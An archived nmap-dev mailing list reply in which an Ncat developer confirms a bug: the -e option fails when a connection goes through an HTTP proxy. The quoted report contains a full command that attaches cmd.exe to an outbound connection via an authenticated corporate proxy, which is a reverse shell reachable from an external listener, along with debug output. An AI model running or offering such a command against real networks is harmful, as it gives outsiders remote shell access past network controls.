'Re: NCat Proxy Support - Proxy-Authenticate'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       nmap-dev
Subject:    Re: NCat Proxy Support - Proxy-Authenticate
From:       David Fifield <david () bamsoftware ! com>
Date:       2010-12-29 17:14:57
Message-ID: 20101229171457.GB3481 () debian ! bamsoftware ! com
[Download RAW message or body]

On Mon, Dec 06, 2010 at 12:08:40PM +0100, Florian Roth wrote:
> 
> Great!
> I'll test it.
> 
> --- 20min later ---
> 
> It works.
> The only problem I noticed was the executing of a program after the
> connection has been established. 
> 
> What I did:
> 
> === On the system inside the network ===========================
> 
> D:\ncat-win32>ncat.exe -vvv -e cmd --proxy proxy.company.de:8080
> --proxy-auth user:pass 87.106.48.12 443
> 
> Ncat: Version 5.36TEST2 ( http://nmap.org/ncat )
> NCAT DEBUG: Proxy returned status code 407.
> NCAT DEBUG: Reconnection header:
> CONNECT 87.106.48.12:443 HTTP/1.0
> Proxy-Authorization: Basic XxxxXXXxxxxXXXXXxxxX==
> 
> NCAT DEBUG: Proxy returned status code 200.
> NSOCK (0.0000s) Read request from IOD #1 (peer unspecified) (timeout:
> -1ms) EID 10
> NSOCK (0.0000s) Read request for 0 bytes from IOD #2 (peer unspecified)
> EID 18
> NSOCK (36.3590s) Callback: READ SUCCESS for EID 10 [(null):65535] (4
> bytes)
> 
> dir
> 
> NSOCK (36.3590s) Read request for 0 bytes from IOD #1 [(null):65535] EID
> 26
> NSOCK (49.9370s) Callback: READ SUCCESS for EID 26 [(null):65535] (11
> bytes)
> 
> systeminfo
> 
> NSOCK (49.9370s) Read request for 0 bytes from IOD #1 [(null):65535] EID
> 34
> 
> === On the external system ======================================
> 
> s15218815:~# ncat -v -l 443
> Ncat: Version 5.35DC1 ( http://nmap.org/ncat )
> Ncat: Listening on 0.0.0.0:443
> Ncat: Connection from 186.23.100.10:39925.
> dir
> systeminfo
> 
> =================================================================
> 
> The commands written on the external system appear in the terminal but
> the "cmd.exe" has not been executed by ncat before so they just
> interchange the characters. 
> I first thought - well - perhaps this feature is not meant to be used on
> a client which connects over a proxy server. Without the proxy server
> between the systems this works like a charm. 
> I thought that the CONNECT request has to be initialized by the internal
> system and therefore there cannot be a command transmitter outside that
> sends the commands inwards.
> Although the characters appear inside while writing on the outside
> system.
> 
> Am I right, or is this a bug?

You are correct, this is a bug. I added a test for it and made a TODO to
fix it.

David Fifield
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
[prev in list] [next in list] [prev in thread] [next in thread] 